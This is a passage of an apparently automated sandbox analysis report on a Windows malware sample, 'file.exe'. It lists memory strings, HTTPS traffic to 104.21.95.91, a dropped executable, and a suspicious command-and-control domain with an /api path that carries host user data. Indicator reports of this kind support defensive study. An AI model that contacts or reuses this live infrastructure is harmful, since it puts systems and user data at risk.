00000000.00000003.2124702808.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128238916.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2272666225.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127372157.0000000005E39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apiP-
Source: file.exe, 00000000.00000003.2155306590.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apiu
Source: file.exe, 00000000.00000003.2124561103.00000000017FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/r
Source: file.exe, 00000000.00000003.2111053218.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2110280342.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109706634.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109984852.00000000017FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/t
Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store:443/apiLE=user-PCUSERNAME=userUSERPROFILE=C:
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2111402565.0000000005E29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49711 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name:
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name: .idata
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Code function: 3_2_0056FD3E 3_2_0056FD3E
Sample file is different than original file name gathered from version info
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.2224954459.0000000006304000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2236216317.0000000006461000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2249678293.0000000006374000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2238490883.0000000006358000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223655318.000000000630B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218612684.0000000006094000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217729589.00000000062CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2224420371.000000000623B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248094046.0000000006232000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219880350.000000000637A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2229371483.0000000006236000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220469866.0000000006232000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235423861.000000000623D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220854134.00000000062E4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222228481.00000000063A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223332767.0000000006306000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2236003909.000000000634F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2216099204.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223531134.0000000006236000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2221192080.00000000062E7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223012136.00000000063C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2229971250.000000000640E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220095626.00000000062F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234932499.0000000006332000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2236477132.000000000623D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2230931394.0000000006238000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222854969.00000000062F4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2245593002.0000000006365000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234185301.000000000633E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253092496.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222701181.000000000623B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2231984789.000000000642F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234761968.0000000006236000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247217329.00000000064B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
